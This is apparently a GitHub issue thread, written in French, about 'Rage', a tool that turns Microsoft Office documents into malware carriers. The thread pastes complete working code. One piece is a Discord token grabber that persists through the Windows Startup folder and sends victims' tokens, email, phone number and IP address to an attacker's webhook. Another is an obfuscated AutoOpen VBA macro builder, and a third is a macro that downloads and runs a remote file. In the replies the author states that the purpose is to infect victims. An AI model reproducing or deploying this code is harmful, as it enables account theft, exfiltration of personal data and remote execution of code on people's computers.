billythegoat356 / Rage

Rage allows you to execute any file in a Microsoft Office document.
Eclipse Public License 2.0

non cest pas un token grab (lisez le code svp) #2

Open dazd-pkz opened 2 years ago

dazd-pkz commented 2 years ago

path = "%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/rage.pyw" % getenv("userprofile") if not isfile(path): copy(file, path) startfile(path) remove(file) exit() elif file.replace('\', '/') != path.replace('\', '/'): exit() webhook = '""" + webhook + r"""' pingme = """ + str(ping) + r""" class Discord: def setheaders(token: str = None) -> dict: headers = {'content-type': 'application/json', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'} if token: headers['authorization'] = token return headers def get_tokens() -> list: tokens = [] LOCAL = getenv("LOCALAPPDATA") ROAMING = getenv("APPDATA") PATHS = { "Discord": ROAMING + "\Discord", "Discord Canary": ROAMING + "\discordcanary", "Discord PTB": ROAMING + "\discordptb", "Google Chrome": LOCAL + "\Google\Chrome\User Data\Default", "Opera": ROAMING + "\Opera Software\Opera Stable", "Brave": LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default", "Yandex": LOCAL + "\Yandex\YandexBrowser\User Data\Default" } def search(path: str) -> list: path += "\Local Storage\leveldb" found_tokens = [] if isdir(path): for file_name in listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[\w-]{24}.[\w-]{6}.[\w-]{27}", r"mfa.[\w-]{84}"): for token in findall(regex, line): try: urlopen(Request( "https://discord.com/api/v9/users/@me", headers=Discord.setheaders(token))) except HTTPError: continue if token not in found_tokens and token not in tokens: found_tokens.append(token) return found_tokens for path in PATHS: for token in search(PATHS[path]): tokens.append(token) return tokens class Grab: def token_grab(token: str): def getavatar(uid, aid) -> str: url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}" try: urlopen(Request(url, headers=Discord.setheaders())) except HTTPError: url += 
".gif" return url def has_payment_methods(token) -> bool: has = False try: has = bool(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=Discord.setheaders(token))).read())) except: pass return has valid, invalid = "<:valide:858700826499219466>", "<:invalide:858700726905733120>" def verify(var): return valid if var else invalid user_data = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=Discord.setheaders(token))).read()) ip = loads(urlopen(Request('http://ipinfo.io/json')).read())['ip'] computer_username = getenv("username") username = user_data["username"] + \ "#" + str(user_data["discriminator"]) user_id = user_data["id"] avatar_id = user_data["avatar"] avatar_url = f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}" email = user_data.get("email") phone = user_data.get("phone") mfa_enabled = bool(user_data['mfa_enabled']) email_verified = bool(user_data['verified']) billing = bool(has_payment_methods(token)) nitro = bool(user_data.get("premium_type")) nitro = valid if nitro else invalid email_verified = verify(email_verified) billing = verify(billing) mfa_enabled = verify(mfa_enabled) if not phone: phone = invalid data = [{ "title": "Rage", "description": "Grabbed!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Infos Du Compte", "value": f'Email: {email}\nTéléphone: {phone}\nPaiement: {billing}', "inline": True }, { "name": "Infos du PC", "value": f"IP: {ip}\nUtilisateur: {computer_username}", "inline": True }, { "name": "Infos Supplémentaires", "value": f'Nitro: {nitro}\n2FA: {mfa_enabled}', "inline": False }, { "name": "Token", "value": f"||{token}||", "inline": False } ], "author": { "name": f"{username}", "icon_url": avatar_url }, "thumbnail": { "url": 
"https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(data) def send(data: str): data = {"username": "Rage", "avatar_url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb", "embeds": data, "content": "@everyone" if pingme else ""} return urlopen(Request(webhook, data=dumps(data).encode('utf-8'), headers=Discord.setheaders())) sent_tokens = [] def token_grab(): for token in Discord.get_tokens(): if token not in sent_tokens: Grab.token_grab(token) sent_tokens.append(token) ready_data = [{ "title": "Rage", "description": "Initialized!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Ready!", "value": 'I am ready to find some tokens!', "inline": True } ], "thumbnail": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(ready_data) while True: if not isfile(file): exit() token_grab() """

e = b64encode(code.encode('cp850')).decode('cp850')

encoded = [e[:900], e[900:1800], e[1800:2700], e[2700:3600], e[3600:4500], e[4500:5400], e[5400:6300], e[6300:7200], e[7200:8100], e[8100:9000], e[9000:9900], e[9900:]]

script = []

for _ in range(len(encoded)):
    chars = ""
    for char in encoded[0]:
        chars += char
    encoded = [l for l in encoded[1:]]
    script.append(chars)

vba =  """Sub AutoOpen()
folder = "C:/Users/" & Environ("username")
Exists = Dir(folder, vbDirectory)

If Exists = "" Then
    folder = "C:/Users/OneDrive/" & Environ("username")

End If

ChDir (folder)

myFile = "_rage.py"
Open myFile For Output As #1
"""

vba += f"""Print #1, "b64list=''.join('''"
"""

for line in script:
    vba += f"""Print #1, "{line}"
"""

vba += f"""Print #1, "'''.splitlines());exec(__import__('base64').b64decode(b64list).decode('cp850'))"
"""

vba += """Close #1
Shell ("python _rage.py")

End Sub""" return vba

# mkcustomscript: build the VBA source of an `AutoOpen` macro that downloads
# `link` and launches the downloaded file.
#
# Args:
#   link: URL placed verbatim into the macro's `URL = "..."` assignment.
#   extension: suffix appended to `_rage` to form the saved file name; it is
#     also placed verbatim into the line written to the batch file.
#
# Returns:
#   The macro text as a single string.
#
# Behaviour of the generated macro, for analysts triaging a document that
# carries it:
#   1. Changes directory to C:/Users/<username>, or to
#      C:/Users/OneDrive/<username> when Dir() returns "" for the first path.
#   2. Sends a synchronous GET (third Open argument is False) through a
#      Microsoft.XMLHTTP object.
#   3. Writes the response body through ADODB.Stream in binary mode
#      (Type = 1) to `_rage<extension>`; SaveToFile option 2 overwrites an
#      existing file of that name.
#   4. Writes `_rage_exec.bat` containing `start _rage<extension>` and runs
#      it through Shell.
#
# Detection and mitigation notes:
#   - AutoOpen is one of Word's automatic macros, so the chain only starts
#     when macros are allowed to run; blocking macros in documents that
#     come from the internet stops it before step 1.
#   - Observable artefacts are an Office process making an outbound HTTP
#     request, `_rage*` and `_rage_exec.bat` appearing in the user profile
#     directory, and a command interpreter spawned as a child of the Office
#     process. The attack surface reduction rule "Block all Office
#     applications from creating child processes" targets that last step.
#   - The CreateObject("Microsoft.XMLHTTP") / CreateObject("ADODB.Stream") /
#     Shell combination inside one macro is a common static signature for
#     download-and-run documents.
def mkcustomscript(link: str, extension: str) -> str:

# The whole body is one f-string; the only substituted fields are {link}
# (once) and {extension} (twice). Everything else is literal VBA.
return f"""Sub AutoOpen()
folder = "C:/Users/" & Environ("username")
Exists = Dir(folder, vbDirectory)

If Exists = "" Then
    folder = "C:/Users/OneDrive/" & Environ("username")

End If

ChDir (folder)

Dim URL As String
URL = "{link}"

Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", URL, False
WinHttpReq.send

Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile "_rage{extension}", 2
oStream.Close

myFile = "_rage_exec.bat"
Open myFile For Output As #1
Print #1, "start _rage{extension}"
Close #1
Shell ("_rage_exec.bat")

End Sub"""

dazd-pkz commented 2 years ago

ton histoire : « + Very advanced token grabber click here to learn more », c'est cool, mais le problème c'est qu'il exécute tout ça au démarrage si je comprends bien, donc bizarre, hein ?

dis-moi si je me trompe, avec arguments bien sûr !

billythegoat356 commented 2 years ago

le fichier se déplace au démarrage, et s'exécute en arrière-plan, oui ;) pourquoi tu trouves ça bizarre ? c'est le but du token grabber, infecter la victime...

dazd-pkz commented 2 years ago

rage, c'est pas un logiciel pour pouvoir rendre "infectés" des fichiers word ? si oui, pourquoi on le fout au démarrage du .py ?

dazd-pkz commented 2 years ago

le but (de ce que je sais) c'est d'aider les gens à infecter le fichier, pas les infecter ?

billythegoat356 commented 2 years ago

parce qu'il y a un mode qui injecte un script python dans le fichier word ; ce script python va se déplacer au démarrage pour que la victime soit infectée. lis le code...